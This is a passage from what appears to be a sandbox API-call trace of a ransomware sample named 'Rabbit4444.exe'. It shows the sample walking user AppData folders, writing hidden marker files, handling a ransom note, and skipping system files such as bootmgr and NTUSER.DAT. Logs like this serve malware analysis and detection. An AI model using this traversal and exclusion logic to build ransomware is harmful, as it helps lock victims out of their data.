lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0063.335] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies" [0063.335] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\" [0063.335] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0063.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.336] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.339] FlushFileBuffers (hFile=0x298) returned 1 [0063.340] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.340] CloseHandle (hObject=0x298) returned 1 [0063.340] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies") returned 90 [0063.340] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.340] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba130d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef11c5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0063.340] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.340] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.340] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.340] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.340] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba130d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef11c5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.341] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.341] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.341] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.341] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.341] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.341] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef11c5de, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef11c5de, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef14287a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.341] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.341] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.341] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef11c5de, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef11c5de, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef14287a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.341] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0063.341] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.341] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.342] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.342] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.342] CloseHandle (hObject=0x278) returned 1 [0063.342] CloseHandle (hObject=0x298) returned 1 [0063.342] GetCurrentThreadId () returned 0xd98 [0063.342] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0063.342] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe" [0063.342] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113198 | out: hHeap=0xe0000) returned 1 [0063.342] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0063.342] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe" [0063.342] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\" [0063.342] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0063.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.345] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.347] FlushFileBuffers (hFile=0x298) returned 1 [0063.348] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.348] CloseHandle (hObject=0x298) returned 1 [0063.349] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe") returned 74 [0063.349] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.349] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xbd8024eb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef14287a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0063.349] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.349] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.349] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.349] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.349] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xbd8024eb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef14287a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.349] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.349] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.349] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.349] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.349] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.349] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef14287a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef14287a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef14287a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.349] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.349] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.349] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe27bb52, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38b51312, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x38b51312, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.350] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0063.350] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0063.350] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0063.350] lstrcpyW (in: lpString1=0x130ebce, lpString2="AC" | out: lpString1="AC") returned="AC" [0063.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0063.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9c) returned 0x121ba8 [0063.350] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x1222a8 [0063.350] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe22f6ae, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab5abf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe22f6ae, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0063.350] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0063.350] lstrcpyW (in: lpString1=0x130ebce, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0063.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0063.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x117ec8 [0063.350] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122068 [0063.350] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab5f4b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe170ad7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0063.350] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.350] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.350] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0063.351] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0063.351] lstrcpyW (in: lpString1=0x130ebce, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0063.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220e0 [0063.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123bd8 [0063.351] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220e8 | out: ListHead=0xf68b0, ListEntry=0x1220e8) returned 0x121fe8 [0063.351] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab6289, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe170ad7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0063.351] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0063.351] lstrcpyW (in: lpString1=0x130ebce, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0063.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0063.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123eb8 [0063.351] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x1220e8 [0063.351] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab67a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe170ad7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0063.351] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.351] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.351] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0063.351] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0063.352] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0063.352] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0063.352] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0063.352] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0063.352] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0063.352] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0063.352] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0063.352] lstrcpyW (in: lpString1=0x130ebce, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0063.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0063.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x124250 [0063.352] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122308 [0063.352] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7133ee1b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0063.352] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0063.352] lstrcpyW (in: lpString1=0x130ebce, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0063.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0063.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118398 [0063.352] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x1222e8 [0063.352] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2f14b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbd2f14b6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbd2f14b6, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0063.352] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.352] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.352] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0063.352] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0063.352] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0063.352] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0063.352] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0063.353] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0063.353] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0063.353] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0063.353] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0063.353] lstrcpyW (in: lpString1=0x130ebce, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0063.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0063.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123380 [0063.353] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122108 [0063.353] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1b326c8, 